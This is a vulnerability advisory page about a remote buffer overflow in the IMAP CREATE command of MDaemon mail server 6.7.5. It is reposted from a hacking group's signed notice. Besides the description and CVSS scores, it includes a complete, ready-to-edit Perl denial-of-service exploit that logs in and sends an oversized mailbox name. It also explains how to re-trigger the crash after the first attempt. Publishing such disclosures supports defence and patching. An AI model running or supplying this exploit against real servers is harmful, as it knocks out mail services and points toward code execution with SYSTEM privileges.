MDaemon SMTP/POP/IMAP server =>v.6.7.5: IMAP buffer overflow

2007.10.25
Credit: D4rkGr3y
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 9/10
Impact Subscore: 10/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

-----BEGIN PGP SIGNED MESSAGE----- ########################################################* # Damage Hacking Group security advisory # www.dhgroup.org ########################################################* #Product: MDaemon SMTP/POP/IMAP server =>v.6.7.5 #Authors: Alt-N Technologies [www.mdaemon.com] #Vulnerability: remote buffer overflow in IMAP service ########################################################* #Overview#-----------------------------------------------------# - - From help-file: "MDaemon Server v6 brings SMTP/POP/IMAP and MIME mail services commonplace on UNIX hosts and the Internet to Windows based servers and microcomputers. MDaemon is designed to manage the email needs of any number of individual users and comes complete with a powerful set of integrated tools for managing mail accounts and message formats. MDaemon offers a scalable SMTP, POP3, and IMAP4 mail server complete with LDAP support, an integrated browser-based email client, content filtering, spam blockers, extensive security features, and more." #Problem#------------------------------------------------------# Remote buffer overflow was found in MDaemon IMAP service. A remote authorized user can execute arbitrary code on the server with SYSTEM privileges. ?Create? command for the IMAP server do not have proper bounds checking, enabling a user to shutdown the service remotely. It should be noted that a user account is required. Remote authorized user may create new mailbox via IMAP service with mailbox name more then 1Kb. In result, SMTP/POP/IMAP/LDAP will crash, but WorldClient and WebAdmin will work normally. For example: 0 CREATE AAAAAAA..[1kb]..AAA When we send "0 CREATE AAAAAAA..[1kb]..AAA", Server creates mailbox with name " AAAAA.. [202b..] AAA " and crash. Second time we exact also we can not attack, because the server will consider, that the mailbox "AAAAA...AAA" is already created and will refuse to process command. To bypass it, we must change any character from the first 202 characters (for example, create " BAAAAAA... AA" or "BBBBBBB...BB" instead of "AAAAA... AA?). A vulnerability may use to execute arbitrary code (the remote user can cause the EAX and EDI registers to be overwritten with arbitrary data). All code will be run with system privileges (if MDaemon installed like a system service). #Exploit#------------------------------------------------------# #!/usr/bin/perl ############### #MDaemon SMTP/POP/IMAP server v.6.7.5 #Remote DoS exploit ##Edit this stuff: $host = "imap_server"; $port = "143"; $login = "login"; $pass = "pass"; #Attention! If exploit doesn't #work, change this: $data = "A"; ############### use IO::Socket; $num = "1000"; $buf .= $data x $num; print "Connecting... "; $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Couldn't connect.\n"; print " OK\n" print "Attacking... "; print $socket "DHGroup Login $login $pass\n"; sleep(1); print $socket "DHGroup CREATE $buf\n"; sleep(1); print " OK\n"; print "Exiting... \n"; close($socket); ##//www.dhgroup.org// #EOF PS. thx to PIG_KILLER [www.securitylab.ru] Best regards www.dhgroup.org D4rkGr3y icq 540981 -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com> iQCVAwUBPqtN/m4LIpseSJmPAQGxeAQAvDYdM2zMEdFqficvGBHrqTz+owhXEoUs guRgs/vpHB1Mz4nLaISmtughGNJQg5H03YDzr7UqEasJ40GpxA7CDpzpcqlyO7KX kOjeTsu6OF+hjmgIwTMJuKgGeXE5GWRS79IZb820w8DrDaIhMLCnu3fUBk+4EV7a 7oxsrKvseVA= =WnA1 -----END PGP SIGNATURE-----


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top